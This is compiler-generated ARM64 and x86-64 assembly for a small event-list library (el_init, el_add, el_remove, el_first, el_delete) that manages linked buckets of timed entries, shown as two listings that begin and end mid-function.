ldr x8, [x8, #16] ldr x8, [x8, #40] stur x8, [x29, #-16] mov w8, #1 str w8, [sp, #36] b LBB4_14 LBB4_14: ; Parent Loop BB4_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-16] ldr x8, [x8] ldr x9, [sp, #16] subs x8, x8, x9 cset w8, lt tbnz w8, #0, LBB4_16 b LBB4_15 LBB4_15: ; in Loop: Header=BB4_14 Depth=2 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] ldur x8, [x29, #-16] ldr x8, [x8, #40] stur x8, [x29, #-16] b LBB4_14 LBB4_16: ; in Loop: Header=BB4_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #48] stur x8, [x29, #-16] ldr x8, [sp, #48] ldr x8, [x8, #8] ldr x9, [sp, #40] str x8, [x9, #8] ldr x8, [sp, #40] ldr x9, [sp, #48] str x8, [x9, #8] ldr x8, [sp, #16] ldur x9, [x29, #-40] str x8, [x9] ldur x8, [x29, #-32] ldr w8, [x8, #8] ldr w9, [sp, #36] subs w8, w8, w9 add w8, w8, #1 ldur x9, [x29, #-40] str w8, [x9, #8] ldur x8, [x29, #-32] ldr x8, [x8, #24] ldur x9, [x29, #-40] str x8, [x9, #24] ldur x8, [x29, #-32] ldur x9, [x29, #-40] str x8, [x9, #32] ldur x8, [x29, #-40] ldur x9, [x29, #-32] ldr x9, [x9, #24] str x8, [x9, #32] ldur x8, [x29, #-40] ldur x9, [x29, #-32] str x8, [x9, #24] ldr w8, [sp, #36] ldur x9, [x29, #-32] str w8, [x9, #8] ldr x8, [sp, #16] ldur x9, [x29, #-24] str x8, [x9] ldur x8, [x29, #-16] ldr x8, [x8, #40] ldur x9, [x29, #-24] str x8, [x9, #40] ldur x8, [x29, #-16] ldur x9, [x29, #-24] str x8, [x9, #48] ldur x8, [x29, #-24] ldur x9, [x29, #-16] ldr x9, [x9, #40] str x8, [x9, #48] ldur x8, [x29, #-24] ldur x9, [x29, #-16] str x8, [x9, #40] b LBB4_4 LBB4_17: adrp x8, _current@PAGE ldr x9, [x8, _current@PAGEOFF] ldr x9, [x9, #48] ldr x10, [x8, _current@PAGEOFF] ldr x10, [x10, #40] str x9, [x10, #48] ldr x9, [x8, _current@PAGEOFF] ldr x9, [x9, #40] ldr x10, [x8, _current@PAGEOFF] ldr x10, [x10, #48] str x9, [x10, #40] ldr x8, [x8, _current@PAGEOFF] stur x8, [x29, #-16] b LBB4_18 LBB4_18: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB4_20 b LBB4_19 LBB4_19: ; in Loop: Header=BB4_18 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #48] stur x8, [x29, #-16] b LBB4_18 LBB4_20: ldur x8, [x29, #-16] ldr x8, [x8, #32] stur x8, [x29, #-32] ldur x8, [x29, #-32] ldr w8, [x8, #8] subs w8, w8, #1 ldur x9, [x29, #-32] str w8, [x9, #8] ldur x8, [x29, #-32] ldr w8, [x8, #8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_22 b LBB4_21 LBB4_21: ldur x8, [x29, #-32] ldr x8, [x8, #32] ldur x9, [x29, #-32] ldr x9, [x9, #24] str x8, [x9, #32] ldur x8, [x29, #-32] ldr x8, [x8, #24] ldur x9, [x29, #-32] ldr x9, [x9, #32] str x8, [x9, #24] ldur x0, [x29, #-32] bl _free b LBB4_22 LBB4_22: adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] ldr x8, [x8, #48] stur x8, [x29, #-24] b LBB4_23 LBB4_23: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB4_25 b LBB4_24 LBB4_24: ; in Loop: Header=BB4_23 Depth=1 ldur x8, [x29, #-24] ldrsh w8, [x8, #24] subs w8, w8, #0 cset w8, ne str w8, [sp, #12] ; 4-byte Folded Spill b LBB4_25 LBB4_25: ; in Loop: Header=BB4_23 Depth=1 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB4_27 b LBB4_26 LBB4_26: ; in Loop: Header=BB4_23 Depth=1 ldur x8, [x29, #-24] ldr x8, [x8, #48] stur x8, [x29, #-24] b LBB4_23 LBB4_27: adrp x8, _current@PAGE str x8, [sp] ; 8-byte Folded Spill ldr x9, [x8, _current@PAGEOFF] ldr x9, [x9, #16] str x9, [sp, #24] ldr x0, [x8, _current@PAGEOFF] bl _free ldr x9, [sp] ; 8-byte Folded Reload ldur x8, [x29, #-24] str x8, [x9, _current@PAGEOFF] ldr x8, [sp, #24] stur x8, [x29, #-8] b LBB4_28 LBB4_28: ldur x0, [x29, #-8] ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .globl _el_delete ; -- Begin function el_delete .p2align 2 _el_delete: ; @el_delete .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: b LBB5_15 LBB5_2: adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] stur x8, [x29, #-8] ldur x8, [x29, #-8] ldr x8, [x8] str x8, [sp, #24] b LBB5_3 LBB5_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_5 b LBB5_4 LBB5_4: ; in Loop: Header=BB5_3 Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #24] str x8, [sp, #24] b LBB5_3 LBB5_5: ldr x8, [sp, #24] ldr x8, [x8, #16] str x8, [sp, #8] b LBB5_6 LBB5_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_8 b LBB5_7 LBB5_7: ; in Loop: Header=BB5_6 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #48] str x8, [sp] ldr x0, [sp, #8] bl _free ldr x8, [sp] str x8, [sp, #8] b LBB5_6 LBB5_8: b LBB5_9 LBB5_9: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_11 b LBB5_10 LBB5_10: ; in Loop: Header=BB5_9 Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #32] str x8, [sp, #16] ldr x0, [sp, #24] bl _free ldr x8, [sp, #16] str x8, [sp, #24] b LBB5_9 LBB5_11: b LBB5_12 LBB5_12: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_14 b LBB5_13 LBB5_13: ; in Loop: Header=BB5_12 Depth=1 ldur x8, [x29, #-8] ldr x8, [x8, #8] stur x8, [x29, #-16] ldur x0, [x29, #-8] bl _free ldur x8, [x29, #-16] stur x8, [x29, #-8] b LBB5_12 LBB5_14: ; kill: def $x8 killed $xzr adrp x8, _index@PAGE str xzr, [x8, _index@PAGEOFF] adrp x8, _current@PAGE str xzr, [x8, _current@PAGEOFF] b LBB5_15 LBB5_15: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _current ; @current .zerofill __DATA,__common,_current,8,3 .zerofill __DATA,__bss,_DU,4,2 ; @DU .zerofill __DATA,__bss,_LB,8,3 ; @LB .zerofill __DATA,__bss,_DT,8,3 ; @DT .zerofill __DATA,__bss,_NLIM,4,2 ; @NLIM .zerofill __DATA,__bss,_index,8,3 ; @index .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _el_init ## -- Begin function el_init .p2align 4, 0x90 _el_init: ## @el_init .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movl %ecx, -28(%rbp) cmpl $1, -4(%rbp) jl LBB0_3 ## %bb.1: cmpq $1, -24(%rbp) jl LBB0_3 ## %bb.2: cmpl $1, -28(%rbp) jge LBB0_4 LBB0_3: jmp LBB0_12 LBB0_4: movl -4(%rbp), %eax addl $1, %eax movl %eax, _DU(%rip) movq -16(%rbp), %rax movq %rax, _LB(%rip) movq -24(%rbp), %rax movq %rax, _DT(%rip) movl -28(%rbp), %eax movl %eax, _NLIM(%rip) movl $56, %edi callq _xmalloc movq %rax, -88(%rbp) movq _LB(%rip), %rcx movq -88(%rbp), %rax movq %rcx, (%rax) movq -88(%rbp), %rax movw $1, 24(%rax) movq -88(%rbp), %rax movq $0, 40(%rax) movq -88(%rbp), %rax movq %rax, -80(%rbp) movl $40, %edi callq _xmalloc movq %rax, -72(%rbp) movq _LB(%rip), %rcx movq -72(%rbp), %rax movq %rcx, (%rax) movq -72(%rbp), %rax movl $1, 8(%rax) movq -88(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 16(%rax) movq -72(%rbp), %rax movq $0, 24(%rax) movq -72(%rbp), %rax movq %rax, -64(%rbp) movq -72(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, 32(%rax) movq $0, -48(%rbp) movq _LB(%rip), %rax movq %rax, -40(%rbp) movl $1, -32(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 movl -32(%rbp), %eax cmpl _DU(%rip), %eax jge LBB0_11 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movq -40(%rbp), %rax addq _DT(%rip), %rax movq %rax, -40(%rbp) movl $56, %edi callq _xmalloc movq %rax, -88(%rbp) movq -40(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, (%rax) movq -88(%rbp), %rax movw $1, 24(%rax) movq -80(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, 40(%rax) movq -88(%rbp), %rcx movq -80(%rbp), %rax movq %rcx, 48(%rax) movq -88(%rbp), %rax movq %rax, -80(%rbp) movl $40, %edi callq _xmalloc movq %rax, -72(%rbp) movq -40(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, (%rax) movq -72(%rbp), %rax movl $1, 8(%rax) movq -88(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 16(%rax) movq -64(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 24(%rax) movq -72(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, 32(%rax) movq -72(%rbp), %rax movq %rax, -64(%rbp) movq -72(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, 32(%rax) movl $16, %edi callq _xmalloc movq %rax, -56(%rbp) movq -72(%rbp), %rcx movq -56(%rbp), %rax movq %rcx, (%rax) cmpq $0, -48(%rbp) jne LBB0_8 ## %bb.7: ## in Loop: Header=BB0_5 Depth=1 movq -56(%rbp), %rax movq %rax, _index(%rip) jmp LBB0_9 LBB0_8: ## in Loop: Header=BB0_5 Depth=1 movq -56(%rbp), %rcx movq -48(%rbp), %rax movq %rcx, 8(%rax) LBB0_9: ## in Loop: Header=BB0_5 Depth=1 movq -56(%rbp), %rax movq %rax, -48(%rbp) ## %bb.10: ## in Loop: Header=BB0_5 Depth=1 movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) jmp LBB0_5 LBB0_11: movl $56, %edi callq _xmalloc movq %rax, -88(%rbp) movq -88(%rbp), %rax movq $2147483647, (%rax) ## imm = 0x7FFFFFFF movq -88(%rbp), %rax movw $1, 24(%rax) movq -80(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, 40(%rax) movq -88(%rbp), %rax movq $0, 48(%rax) movq -88(%rbp), %rcx movq -80(%rbp), %rax movq %rcx, 48(%rax) movl $40, %edi callq _xmalloc movq %rax, -72(%rbp) movq -72(%rbp), %rax movq $2147483647, (%rax) ## imm = 0x7FFFFFFF movq -72(%rbp), %rax movl $1, 8(%rax) movq -88(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 16(%rax) movq -64(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 24(%rax) movq -72(%rbp), %rax movq $0, 32(%rax) movq -72(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, 32(%rax) movq -72(%rbp), %rcx movq -88(%rbp), %rax movq %rcx, 32(%rax) movl $16, %edi callq _xmalloc movq %rax, -56(%rbp) movq -72(%rbp), %rcx movq -56(%rbp), %rax movq %rcx, (%rax) movq -56(%rbp), %rax movq $0, 8(%rax) movq -56(%rbp), %rcx movq -48(%rbp), %rax movq %rcx, 8(%rax) movq $0, _current(%rip) LBB0_12: addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _el_add ## -- Begin function el_add .p2align 4, 0x90 _el_add: ## @el_add .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movl %edx, -28(%rbp) cmpq $0, _index(%rip) je LBB1_2 ## %bb.1: cmpq $0, -24(%rbp) jg LBB1_3 LBB1_2: movl $-1, -4(%rbp) jmp LBB1_26 LBB1_3: movq -24(%rbp), %rax cmpq _LB(%rip), %rax jge LBB1_5 ## %bb.4: movl $-2, -4(%rbp) jmp LBB1_26 LBB1_5: movl $56, %edi callq _xmalloc movq %rax, -64(%rbp) movq -24(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, (%rax) movl -28(%rbp), %ecx movq -64(%rbp), %rax movl %ecx, 8(%rax) movq -16(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, 16(%rax) movq -64(%rbp), %rax movw $0, 24(%rax) movq -64(%rbp), %rax movq $0, 32(%rax) movq _index(%rip), %rax movq %rax, -40(%rbp) LBB1_6: ## =>This Inner Loop Header: Depth=1 movq -40(%rbp), %rax movq (%rax), %rax movq (%rax), %rax cmpq -24(%rbp), %rax jg LBB1_8 ## %bb.7: ## in Loop: Header=BB1_6 Depth=1 movq -40(%rbp), %rax movq 8(%rax), %rax movq %rax, -40(%rbp) jmp LBB1_6 LBB1_8: movq -40(%rbp), %rax movq (%rax), %rax movq 24(%rax), %rax movq %rax, -48(%rbp) LBB1_9: ## =>This Inner Loop Header: Depth=1 movq -48(%rbp), %rax movq (%rax), %rax cmpq -24(%rbp), %rax jle LBB1_11 ## %bb.10: ## in Loop: Header=BB1_9 Depth=1 movq -48(%rbp), %rax movq 24(%rax), %rax movq %rax, -48(%rbp) jmp LBB1_9 LBB1_11: movq -48(%rbp), %rax movq 32(%rax), %rax movq %rax, -48(%rbp) movq -48(%rbp), %rax movl 8(%rax), %eax cmpl _NLIM(%rip), %eax jne LBB1_19 ## %bb.12: movl _NLIM(%rip), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movq -48(%rbp), %rax movl %ecx, 8(%rax) movq -48(%rbp), %rax movq 16(%rax), %rax movq %rax, -72(%rbp) movl $1, -76(%rbp) LBB1_13: ## =>This Inner Loop Header: Depth=1 movl -76(%rbp), %eax movl %eax, -80(%rbp) ## 4-byte Spill movl _NLIM(%rip), %eax movl $2, %ecx cltd idivl %ecx movl %eax, %ecx movl -80(%rbp), %eax ## 4-byte Reload cmpl %ecx, %eax jg LBB1_16 ## %bb.14: ## in Loop: Header=BB1_13 Depth=1 movq -72(%rbp), %rax movq 40(%rax), %rax movq %rax, -72(%rbp) ## %bb.15: ## in Loop: Header=BB1_13 Depth=1 movl -76(%rbp), %eax addl $1, %eax movl %eax, -76(%rbp) jmp LBB1_13 LBB1_16: movl $40, %edi callq _xmalloc movq %rax, -56(%rbp) movq -72(%rbp), %rax movq (%rax), %rcx movq -56(%rbp), %rax movq %rcx, (%rax) movl _NLIM(%rip), %ecx movl _NLIM(%rip), %eax movl $2, %esi cltd idivl %esi subl %eax, %ecx movq -56(%rbp), %rax movl %ecx, 8(%rax) movq -72(%rbp), %rcx movq -56(%rbp), %rax movq %rcx, 16(%rax) movq -48(%rbp), %rcx movq -56(%rbp), %rax movq %rcx, 32(%rax) movq -48(%rbp), %rax movq 24(%rax), %rcx movq -56(%rbp), %rax movq %rcx, 24(%rax) movq -56(%rbp), %rcx movq -48(%rbp), %rax movq %rcx, 24(%rax) movq -56(%rbp), %rcx movq -56(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -56(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 32(%rax) movq -56(%rbp), %rax movq (%rax), %rax cmpq -24(%rbp), %rax jle LBB1_18 ## %bb.17: movq -56(%rbp), %rax movq %rax, -48(%rbp) LBB1_18: jmp LBB1_19 LBB1_19: movq -48(%rbp), %rax movl 8(%rax), %ecx addl $1, %ecx movq -48(%rbp), %rax movl %ecx, 8(%rax) movq -48(%rbp), %rax movq 16(%rax), %rax movq %rax, -72(%rbp) LBB1_20: ## =>This Inner Loop Header: Depth=1 movq -72(%rbp), %rax movq (%rax), %rax cmpq -24(%rbp), %rax jle LBB1_22 ## %bb.21: ## in Loop: Header=BB1_20 Depth=1 movq -72(%rbp), %rax movq 40(%rax), %rax movq %rax, -72(%rbp) jmp LBB1_20 LBB1_22: movq -72(%rbp), %rax movq 48(%rax), %rcx movq -64(%rbp), %rax movq %rcx, 48(%rax) movq -72(%rbp), %rcx movq -64(%rbp), %rax movq %rcx, 40(%rax) movq -64(%rbp), %rcx movq -72(%rbp), %rax movq 48(%rax), %rax movq %rcx, 40(%rax) movq -64(%rbp), %rcx movq -72(%rbp), %rax movq %rcx, 48(%rax) cmpq $0, _current(%rip) je LBB1_24 ## %bb.23: movq _current(%rip), %rax movq (%rax), %rax cmpq -24(%rbp), %rax jle LBB1_25 LBB1_24: movq -64(%rbp), %rax movq %rax, _current(%rip) LBB1_25: movl $0, -4(%rbp) LBB1_26: movl -4(%rbp), %eax addq $80, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _el_remove ## -- Begin function el_remove .p2align 4, 0x90 _el_remove: ## @el_remove .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) cmpq $0, _index(%rip) je LBB2_2 ## %bb.1: cmpq $0, _current(%rip) jne LBB2_3 LBB2_2: jmp LBB2_42 LBB2_3: movq _current(%rip), %rax movq %rax, -16(%rbp) LBB2_4: ## =>This Loop Header: Depth=1 ## Child Loop BB2_6 Depth 2 ## Child Loop BB2_19 Depth 2 cmpq $0, -16(%rbp) je LBB2_33 ## %bb.5: ## in Loop: Header=BB2_4 Depth=1 jmp LBB2_6 LBB2_6: ## Parent Loop BB2_4 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpq $0, -16(%rbp) movb %al, -49(%rbp) ## 1-byte Spill je LBB2_10 ## %bb.7: ## in Loop: Header=BB2_6 Depth=2 movq -16(%rbp), %rax movswl 24(%rax), %ecx movb $1, %al cmpl $0, %ecx movb %al, -50(%rbp) ## 1-byte Spill jne LBB2_9 ## %bb.8: ## in Loop: Header=BB2_6 Depth=2 movq -16(%rbp), %rax movl 8(%rax), %eax cmpl -4(%rbp), %eax setne %al movb %al, -50(%rbp) ## 1-byte Spill LBB2_9: ## in Loop: Header=BB2_6 Depth=2 movb -50(%rbp), %al ## 1-byte Reload movb %al, -49(%rbp) ## 1-byte Spill LBB2_10: ## in Loop: Header=BB2_6 Depth=2 movb -49(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_11 jmp LBB2_12 LBB2_11: ## in Loop: Header=BB2_6 Depth=2 movq -16(%rbp), %rax movq 48(%rax), %rax movq %rax, -16(%rbp) jmp LBB2_6 LBB2_12: ## in Loop: Header=BB2_4 Depth=1 cmpq $0, -16(%rbp) je LBB2_30 ## %bb.13: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax cmpq $0, 32(%rax) je LBB2_16 ## %bb.14: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax movq 32(%rax), %rax cmpl $1, 8(%rax) jne LBB2_16 ## %bb.15: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax movq 32(%rax), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rax movq 32(%rax), %rcx movq -32(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -32(%rbp), %rax movq 24(%rax), %rcx movq -32(%rbp), %rax movq 32(%rax), %rax movq %rcx, 24(%rax) movq -32(%rbp), %rdi callq _free jmp LBB2_29 LBB2_16: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax cmpq $0, 32(%rax) je LBB2_18 ## %bb.17: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax movq 32(%rax), %rcx movq -16(%rbp), %rax movq 40(%rax), %rax movq %rcx, 32(%rax) movq -16(%rbp), %rax movq 40(%rax), %rax movq (%rax), %rcx movq -16(%rbp), %rax movq 32(%rax), %rax movq %rcx, (%rax) movq -16(%rbp), %rax movq 40(%rax), %rcx movq -16(%rbp), %rax movq 32(%rax), %rax movq %rcx, 16(%rax) LBB2_18: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax movq %rax, -24(%rbp) LBB2_19: ## Parent Loop BB2_4 Depth=1 ## => This Inner Loop Header: Depth=2 movq -24(%rbp), %rax cmpq $0, 32(%rax) jne LBB2_21 ## %bb.20: ## in Loop: Header=BB2_19 Depth=2 movq -24(%rbp), %rax movq 48(%rax), %rax movq %rax, -24(%rbp) jmp LBB2_19 LBB2_21: ## in Loop: Header=BB2_4 Depth=1 movq -24(%rbp), %rax movq 32(%rax), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rax movl 8(%rax), %ecx subl $1, %ecx movq -32(%rbp), %rax movl %ecx, 8(%rax) movq -32(%rbp), %rax movq 24(%rax), %rax movq %rax, -40(%rbp) movq -32(%rbp), %rax movq 32(%rax), %rax movq %rax, -48(%rbp) movq -40(%rbp), %rax movq 16(%rax), %rax cmpw $0, 24(%rax) jne LBB2_24 ## %bb.22: ## in Loop: Header=BB2_4 Depth=1 movq -40(%rbp), %rax movl 8(%rax), %eax movq -32(%rbp), %rcx addl 8(%rcx), %eax cmpl _NLIM(%rip), %eax jg LBB2_24 ## %bb.23: ## in Loop: Header=BB2_4 Depth=1 movq -40(%rbp), %rax movq 16(%rax), %rax movq $0, 32(%rax) movq -40(%rbp), %rax movl 8(%rax), %ecx movq -32(%rbp), %rax addl 8(%rax), %ecx movl %ecx, 8(%rax) movq -32(%rbp), %rcx movq -40(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -40(%rbp), %rax movq 24(%rax), %rcx movq -32(%rbp), %rax movq %rcx, 24(%rax) movq -40(%rbp), %rdi callq _free jmp LBB2_28 LBB2_24: ## in Loop: Header=BB2_4 Depth=1 movq -32(%rbp), %rax movq 16(%rax), %rax cmpw $0, 24(%rax) jne LBB2_27 ## %bb.25: ## in Loop: Header=BB2_4 Depth=1 movq -48(%rbp), %rax movl 8(%rax), %eax movq -32(%rbp), %rcx addl 8(%rcx), %eax cmpl _NLIM(%rip), %eax jg LBB2_27 ## %bb.26: ## in Loop: Header=BB2_4 Depth=1 movq -32(%rbp), %rax movq 16(%rax), %rax movq $0, 32(%rax) movq -32(%rbp), %rax movl 8(%rax), %ecx movq -48(%rbp), %rax addl 8(%rax), %ecx movl %ecx, 8(%rax) movq -48(%rbp), %rcx movq -32(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -32(%rbp), %rax movq 24(%rax), %rcx movq -48(%rbp), %rax movq %rcx, 24(%rax) movq -32(%rbp), %rdi callq _free LBB2_27: ## in Loop: Header=BB2_4 Depth=1 jmp LBB2_28 LBB2_28: ## in Loop: Header=BB2_4 Depth=1 jmp LBB2_29 LBB2_29: ## in Loop: Header=BB2_4 Depth=1 movq -16(%rbp), %rax movq 48(%rax), %rcx movq -16(%rbp), %rax movq 40(%rax), %rax movq %rcx, 48(%rax) movq -16(%rbp), %rax movq 40(%rax), %rcx movq -16(%rbp), %rax movq 48(%rax), %rax movq %rcx, 40(%rax) movq -16(%rbp), %rax movq 48(%rax), %rax movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _free movq -24(%rbp), %rax movq %rax, -16(%rbp) LBB2_30: ## in Loop: Header=BB2_4 Depth=1 cmpl $0, -8(%rbp) je LBB2_32 ## %bb.31: jmp LBB2_33 LBB2_32: ## in Loop: Header=BB2_4 Depth=1 jmp LBB2_4 LBB2_33: movq _index(%rip), %rax movq (%rax), %rax movq 24(%rax), %rax movq %rax, -32(%rbp) LBB2_34: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rax cmpq $0, 24(%rax) je LBB2_36 ## %bb.35: ## in Loop: Header=BB2_34 Depth=1 movq -32(%rbp), %rax movq 24(%rax), %rax movq %rax, -32(%rbp) jmp LBB2_34 LBB2_36: movq -32(%rbp), %rax movq 16(%rax), %rax movq 48(%rax), %rax movq %rax, -16(%rbp) LBB2_37: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpq $0, -16(%rbp) movb %al, -51(%rbp) ## 1-byte Spill je LBB2_39 ## %bb.38: ## in Loop: Header=BB2_37 Depth=1 movq -16(%rbp), %rax movswl 24(%rax), %eax cmpl $0, %eax setne %al movb %al, -51(%rbp) ## 1-byte Spill LBB2_39: ## in Loop: Header=BB2_37 Depth=1 movb -51(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_40 jmp LBB2_41 LBB2_40: ## in Loop: Header=BB2_37 Depth=1 movq -16(%rbp), %rax movq 48(%rax), %rax movq %rax, -16(%rbp) jmp LBB2_37 LBB2_41: movq -16(%rbp), %rax movq %rax, _current(%rip) LBB2_42: addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _el_empty ## -- Begin function el_empty .p2align 4, 0x90 _el_empty: ## @el_empty .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp cmpq $0, _current(%rip) jne LBB3_2 ## %bb.1: movl $1, -4(%rbp) jmp LBB3_3 LBB3_2: movl $0, -4(%rbp) LBB3_3: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _el_first ## -- Begin function el_first .p2align 4, 0x90 _el_first: ## @el_first .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp cmpq $0, _index(%rip) je LBB4_2 ## %bb.1: cmpq $0, _current(%rip) jne LBB4_3 LBB4_2: movq $0, -8(%rbp) jmp LBB4_28 LBB4_3: jmp LBB4_4 LBB4_4: ## =>This Loop Header: Depth=1 ## Child Loop BB4_8 Depth 2 ## Child Loop BB4_11 Depth 2 ## Child Loop BB4_14 Depth 2 movq _index(%rip), %rax movq (%rax), %rax movq (%rax), %rax movq _current(%rip), %rcx cmpq (%rcx), %rax jge LBB4_17 ## %bb.5: ## in Loop: Header=BB4_4 Depth=1 cmpl $2, _DU(%rip) jne LBB4_7 ## %bb.6: ## in Loop: Header=BB4_4 Depth=1 movq _index(%rip), %rax movq (%rax), %rax movq %rax, -32(%rbp) movq _DT(%rip), %rcx movq -32(%rbp), %rax addq (%rax), %rcx movq %rcx, (%rax) movq _DT(%rip), %rcx movq -32(%rbp), %rax movq 16(%rax), %rax addq (%rax), %rcx movq %rcx, (%rax) jmp LBB4_4 LBB4_7: ## in Loop: Header=BB4_4 Depth=1 movq _index(%rip), %rax movq %rax, -56(%rbp) movq -56(%rbp), %rax movq (%rax), %rax movq %rax, -40(%rbp) movq -40(%rbp), %rax movq 16(%rax), %rax movq %rax, -24(%rbp) movq -24(%rbp), %rax movq 48(%rax), %rcx movq -24(%rbp), %rax movq 40(%rax), %rax movq %rcx, 48(%rax) movq -24(%rbp), %rax movq 40(%rax), %rcx movq -24(%rbp), %rax movq 48(%rax), %rax movq %rcx, 40(%rax) movq -40(%rbp), %rax movq 32(%rax), %rcx movq -40(%rbp), %rax movq 24(%rax), %rax movq %rcx, 32(%rax) movq -40(%rbp), %rax movq 24(%rax), %rcx movq -40(%rbp), %rax movq 32(%rax), %rax movq %rcx, 24(%rax) movq _index(%rip), %rax movq 8(%rax), %rax movq %rax, _index(%rip) movq _index(%rip), %rax movq %rax, -48(%rbp) LBB4_8: ## Parent Loop BB4_4 Depth=1 ## => This Inner Loop Header: Depth=2 movq -48(%rbp), %rax movq 8(%rax), %rax cmpq $0, 8(%rax) je LBB4_10 ## %bb.9: ## in Loop: Header=BB4_8 Depth=2 movq -48(%rbp), %rax movq 8(%rax), %rax movq %rax, -48(%rbp) jmp LBB4_8 LBB4_10: ## in Loop: Header=BB4_4 Depth=1 movq -48(%rbp), %rax movq (%rax), %rax movq %rax, -32(%rbp) movq -32(%rbp), %rax movq (%rax), %rax addq _DT(%rip), %rax movq %rax, -80(%rbp) LBB4_11: ## Parent Loop BB4_4 Depth=1 ## => This Inner Loop Header: Depth=2 movq -32(%rbp), %rax movq (%rax), %rax cmpq -80(%rbp), %rax jge LBB4_13 ## %bb.12: ## in Loop: 